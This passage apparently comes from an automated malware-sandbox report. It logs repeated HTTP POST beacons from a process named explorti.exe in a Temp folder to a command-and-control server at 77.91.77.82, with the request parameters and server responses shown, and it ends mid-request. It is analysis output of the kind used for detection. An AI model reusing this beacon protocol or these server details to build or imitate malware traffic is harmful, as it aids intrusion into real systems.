                                                                Jul 3, 2024 08:40:15.820882082 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:40:16.521836996 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:16 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                114192.168.2.64984377.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:16.532994986 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:40:17.215272903 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:17 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                115192.168.2.64984477.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:17.339044094 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:40:18.034796953 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:17 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                116192.168.2.64984577.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:18.047936916 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:40:18.740395069 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:18 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                117192.168.2.64984677.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:18.851634979 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:40:19.548928976 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:19 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                118192.168.2.64984777.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:19.557342052 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:40:20.274173975 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                119192.168.2.64984977.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:20.399319887 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:40:21.075397968 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                120192.168.2.64985077.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:21.085433960 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:40:21.760381937 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:21 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                121192.168.2.64985177.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:21.885418892 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:40:22.571496964 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:22 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                122192.168.2.64985277.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:22.583714008 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:40:23.260404110 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:23 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                123192.168.2.64985377.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:23.384867907 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:40:24.075387955 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:23 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                124192.168.2.64985477.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:24.085321903 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:40:24.765149117 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:24 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                125192.168.2.64985577.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:24.882481098 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:40:25.564378023 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:25 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                126192.168.2.64985677.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:25.576077938 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:40:26.292180061 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:26 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                127192.168.2.64985777.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:26.414858103 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:40:27.092360020 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:26 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                128192.168.2.64985877.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:27.104970932 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:40:27.804145098 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:27 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                129192.168.2.64985977.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:27.915625095 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:40:28.620497942 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:28 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                130192.168.2.64986077.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:28.631416082 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:40:29.332477093 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:29 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                131192.168.2.64986177.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:29.446393013 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:40:30.146261930 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:30 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                132192.168.2.64986277.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:30.156095982 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:40:30.855411053 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:30 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                133192.168.2.64986377.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:30.976747036 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:40:31.652363062 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:40:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                134192.168.2.64986477.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:40:31.662540913 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
